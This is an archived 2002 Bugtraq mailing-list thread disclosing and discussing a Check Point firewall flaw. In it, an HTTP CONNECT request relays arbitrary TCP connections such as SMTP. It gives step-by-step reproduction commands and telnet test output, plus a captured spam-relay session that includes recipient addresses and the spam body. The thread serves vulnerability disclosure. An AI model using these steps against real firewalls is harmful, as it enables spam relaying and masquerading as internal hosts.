Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: UPDATE: [wcolburn () nmt edu: SMTP relay through checkpoint firewall]
From: "Dennis Henderson" <hendo () hendohome com>
Date: Tue, 19 Feb 2002 20:32:19 -0600

William,

I was only partially able to reproduce your issue and it was only to
destinations and services that my firewall would have already allowed
anyway.


root () mojo:~# telnet www.xxx.com 80
Trying 19x.1x8.xx6.1x3...
Connected to www.xxx.com.
Escape character is '^]'.
CONNECT 1x8.1x6.xx1.1x6:25 / HTTP/1.0
HTTP/1.0 200
220 ESMTP
helo firewall
250 mail.xxx.com Hello [1x8.1x6.xx1.1x5], pleased to meet you
quit
221 2.0.0 mail.xxx.com closing connection
Connection closed by foreign host.

Any other connection attempt to a IP:port that was not normally allowed by
policy was denied.

root () mojo:~# telnet www.xxx.com 80
Trying 19x.1x8.xx6.1x3...
Connected to www.xxx.com.
Escape character is '^]'.
CONNECT 1x8.1x6.xx1.1x6:22 / HTTP/1.0
HTTP/1.0 200
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 85
<TITLE>Error</TITLE>
<BODY>
<H1>Error</H1>
FW-1 at xxxexmfwx: Access denied.</BODY>
Connection closed by foreign host.

While it is a little startling that Checkpoint would allow this kind of
connection, I was not able to actually connect to any place that I would not
normally be able to connect from the internet. I do not allow http
tunneling. We are running the http security server strictly to block the
nimda and code red attacks.

I am running 4.1 Sp5

Regards

Dennis




----- Original Message -----
From: "William D. Colburn (aka Schlake)" <wcolburn () nmt edu>
To: <bugtraq () securityfocus com>; "Dan Lunceford" <dan () nmt edu>; "Ryan"
<ryan () nmt edu>; <support () aquilagroup com>
Cc: "Madeline Navarrette" <mnavarre () ts checkpoint com>
Sent: Monday, February 18, 2002 6:09 PM
Subject: UPDATE: [wcolburn () nmt edu: SMTP relay through checkpoint firewall]


Checkpoint bounced my mail because I'm not a checkpoint customer, so I
contacted customer advocacy and resent it to a different address (this
message is copied to her as well).  I was told that the issue would be
propogated to an appropriate person.

Please drop the old message and continue to hold this message until
Checkpoint responds.

I have a few updates to this issue that I have learned since I crafted
the original message.

I only need to give the "CONNECT" line, and nothing else.  After the
second newline there is a pause and then the TCP stream is open.  I seem
to be able to open any port on any machine I want *except* port 80.  I
was able to telnet in to UNIX login with the firewall appearing as the
remote host.  The initial machine I use (inside the firewall) does not
need to actually exist, I merely have to attempt to connect to an IP
address "inside" on port 80.

This whole give anyone outside a firewall the ability to masquerade on
any TCP service (except WWW) as a machine inside the domain of the
firewall.  As far as I can tell there are no logs on this, and it is
hard to detect on the firewall.  I found it by doing a tcpdump of all
packets and gradually narrowing down my filters until I was able to
"catch" an entire transaction.

----- Forwarded message from "William D. Colburn (aka Schlake)"
<wcolburn () nmt edu> -----

Step one: telnet to a machine behind the checkpoint firewall on port 80

Step two: Type the following:
CONNECT mailserver.somecompany.com:25 / HTTP/1.0
User-Agent: eeep
Cache-Control: private,no-cache
Pragma: no-cache


Step three: wait a moment for your SMTP banner to pop up.

I will attach an actual attack I caputured with tcpdump and ethereal.
The file is the result of an ethereal "Follow TCP stream".

I hate the person who did this to me and I hope they die a terrible
death.

--
William Colburn, "Sysprog" <wcolburn () nmt edu>
Computer Center, New Mexico Institute of Mining and Technology
http://www.nmt.edu/tcc/     http://www.nmt.edu/~wcolburn

--AqsLC8rIMeq19msA
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename=checkpoint

From root () netpeep nmt edu  Mon Feb 18 16:05:43 2002
Return-Path: <root () netpeep nmt edu>
Received: from netpeep.nmt.edu (netpeep.nmt.edu [129.138.250.10])
by mailhost.nmt.edu (8.12.2/8.12.2) with ESMTP id g1IN5hF0009872
for <schlake () nmt edu>; Mon, 18 Feb 2002 16:05:43 -0700
Received: from netpeep.nmt.edu (localhost [127.0.0.1])
by netpeep.nmt.edu (8.12.2/8.12.2) with ESMTP id g1IN5hnA020585
for <schlake () nmt edu>; Mon, 18 Feb 2002 16:05:43 -0700
Received: (from root () localhost)
by netpeep.nmt.edu (8.12.2/8.12.1/Submit) id g1IN5h8w020584
for schlake () nmt edu; Mon, 18 Feb 2002 16:05:43 -0700
Date: Mon, 18 Feb 2002 16:05:43 -0700
From: root <root () netpeep nmt edu>
Message-Id: <200202182305.g1IN5h8w020584 () netpeep nmt edu>
To: schlake () nmt edu
Content-Length: 3580
Lines: 112

CONNECT mail2.freeuk.net:25 / HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Cache-Control: private,no-cache
Pragma: no-cache

HELO hotmail.com
MAIL FROM: <pheros680506 () hotmail com>
RCPT TO: <renewinter () freeuk com>
RCPT TO: <renewu () freeuk com>
RCPT TO: <renfah () freeuk com>
RCPT TO: <renfi11160 () freeuk com>
RCPT TO: <renfield13 () freeuk com>
RCPT TO: <renfield20 () freeuk com>
RCPT TO: <renfield94 () freeuk com>
RCPT TO: <renfrew () freeuk com>
RCPT TO: <renfro33 () freeuk com>
RCPT TO: <reng3 () freeuk com>
RCPT TO: <renga () freeuk com>
RCPT TO: <rengel293 () freeuk com>
RCPT TO: <rengel7495 () freeuk com>
RCPT TO: <rengelh946 () freeuk com>
RCPT TO: <rengers () freeuk com>
RCPT TO: <rengised () freeuk com>
RCPT TO: <rengl21068 () freeuk com>
RCPT TO: <rengl29048 () freeuk com>
RCPT TO: <rengl78818 () freeuk com>
DATA
Reply-To: <pheros680506 () hotmail com>
Message-ID: <004b71e11dcb$7144b8d2$6ac55bc3 () mlpqff>
From: <pheros680506 () hotmail com>
To: <renewinter () freeuk com>
Cc: <renewu () freeuk com>,
<renfah () freeuk com>,
<renfi11160 () freeuk com>,
<renfield13 () freeuk com>,
<renfield20 () freeuk com>,
<renfield94 () freeuk com>,
<renfrew () freeuk com>,
<renfro33 () freeuk com>,
<reng3 () freeuk com>,
<renga () freeuk com>,
<rengel293 () freeuk com>,
<rengel7495 () freeuk com>,
<rengelh946 () freeuk com>,
<rengers () freeuk com>,
<rengised () freeuk com>,
<rengl21068 () freeuk com>,
<rengl29048 () freeuk com>,
<rengl78818 () freeuk com>
Subject: A new fragrance
(3437AlLf5-384bbsO4815hPeX5-01 () 27)
MiME-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer:
Importance: Normal

Hi !

<HTML>
<head><title>Pheros attraction</title>
</head>
<BODY TEXT="#000000" LINK="#000000" VLINK="#000000" BGCOLOR="#7777FF">
<CENTER>
<TABLE WIDTH="650">
<TR>
<TD COLSPAN="2">
<FONT FACE="VERDANA, ARIAL">Notice: I have paid to be able to send you
this e-mail.  I do not intend to
cause you harm, fill up your mailbox or bother you needlessly.  I am only
trying to reach those who are not as secure in their financial future as I
was when I first started looking for a way to earn money online.  To be
removed, please go to the end of this e-mail. Please forgive me if you
receive this advertisement twice.<BR><BR>
</FONT>
</TD>
</TR>
<TR>
<TD VALIGN="TOP">
<FONT FACE="VERDANA, ARIAL">
Pheros is a lovely fragrance with a touch of human
   pheromones, packaged in a exclusive crafted box.
  Pheros is a foolproof tool of seduction, the scent and the
   pheromones together make a foolproof combination.
 No one can resist the wearer of this mysterious fragrance!
  Pheros combines high tech science with the well-known
     function of the scent of a luxorious perfume. <BR> The price is 19.95
USD/Bottle, including P&P! Payment is done via PayPal!
<BR>To order, klick the Paypal logo <A
HREF="https://www.paypal.com/xclick/business=pheros3%40hotmail.com&item_name
=Pheros&item_number=PherInt001&amount=19.95" TARGET="new"><IMG
SRC="http://images.paypal.com/images/x-click-but02.gif"; border="0"></A>
<BR>

</FONT>
</TD>
<TD>
<IMG SRC="http://pheros.freehosting.net/images/Mailbilden.jpg"; border="2">
</TD>
</TR>
<TR>
<TD COLSPAN="2">
<BR>
<FONT FACE="Verdana, Arial">
To be removed from this mailing list, please reply to this message with
the subjct "remove".
You will be BLOCKED from all mail from this site and your request will
take effect within 24 hours.
</FONT>
</TD>
</TR>
</TABLE>
</CENTER>
</BODY>
</HTML>

[2901sDxs3-632TivA4099LrRl6-563cNjc6630cqwk8-434lwqh9794mwMr2-514eMAy1216cuz
@71]

.
QUIT


--AqsLC8rIMeq19msA--

----- End forwarded message -----

--
William Colburn, "Sysprog" <wcolburn () nmt edu>
Computer Center, New Mexico Institute of Mining and Technology
http://www.nmt.edu/tcc/     http://www.nmt.edu/~wcolburn



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]